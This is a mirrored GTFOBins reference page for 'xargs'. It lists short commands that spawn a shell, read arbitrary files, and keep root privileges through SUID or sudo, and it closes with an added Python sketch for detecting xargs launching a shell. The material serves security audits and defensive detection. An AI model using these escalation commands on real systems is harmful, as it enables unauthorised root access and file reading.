mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-12 23:12:06 +01:00
8eaf595fe6
Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged; in that case we can use `tty` to perform the redirection: `sh <$(tty) >$(tty) 2>$(tty)`
23 lines
733 B
Markdown
---
functions:
  execute-interactive:
    - description: GNU version only.
      code: xargs -a /dev/null sh
    - code: echo x | xargs -Iy sh -c 'exec sh 0<&1'
    - description: Read interactively from `stdin`.
      code: |
        xargs -Ix sh -c 'exec sh 0<&1'
        x^D^D
  file-read:
    - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
      code: |
        LFILE=file_to_read
        xargs -a "$LFILE" -0
  suid-enabled:
    - description: GNU version only.
      code: ./xargs -a /dev/null sh -p
  sudo-enabled:
    - description: GNU version only.
      code: sudo xargs -a /dev/null sh
---
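A detection-side sketch for the entries above, added here and not part of the GTFOBins repository: it parses a command line the way GNU `xargs` separates its own options from the utility it runs, and reports when that utility is a shell. The function names, the shell list, the option tables (an approximation of GNU `xargs` options) and the sample lines are assumptions made for this example.

```python
import os
import shlex

SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}
VALUE_OPTS = set("aEILnPsd")   # short options that require a value
OPTIONAL_OPTS = set("eil")     # value, if any, is attached to the option
LONG_VALUE_OPTS = {"--arg-file", "--delimiter", "--max-args",
                   "--max-chars", "--max-procs"}

def xargs_utility(args):
    """Given the tokens after 'xargs', return the command it would run."""
    i = 0
    while i < len(args):
        tok = args[i]
        if tok == "--":
            return args[i + 1:]
        if tok.startswith("--"):
            # '--opt=value' is one token; '--opt value' is two.
            i += 2 if tok in LONG_VALUE_OPTS else 1
            continue
        if tok == "-" or not tok.startswith("-"):
            return args[i:]          # first non-option is the utility
        for pos, ch in enumerate(tok[1:], start=1):
            if ch in OPTIONAL_OPTS:
                break                # rest of token is its value
            if ch in VALUE_OPTS:
                if pos == len(tok) - 1:
                    i += 1           # value is the next token
                break
        i += 1
    return []

def shell_via_xargs(cmdline):
    """Return a finding if cmdline has xargs launching a shell, else None."""
    tokens = shlex.split(cmdline)
    for idx, tok in enumerate(tokens):
        if os.path.basename(tok) != "xargs":
            continue
        utility = xargs_utility(tokens[idx + 1:])
        if utility and os.path.basename(utility[0]) in SHELLS:
            return {"shell": utility[0], "sudo": "sudo" in tokens[:idx],
                    "dash_p": "-p" in utility[1:]}
    return None

# Constructed sample command lines (not real log data).
SAMPLES = ["sudo xargs -a /dev/null sh", "./xargs -a /dev/null sh -p",
           "find . -name '*.log' -print0 | xargs -0 -n 50 gzip"]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", shell_via_xargs(line))
```

The `file-read` entry runs `xargs` with no utility, so it spawns no shell and is not reported by this check; catching it needs a separate rule on `-a` pointing at sensitive paths.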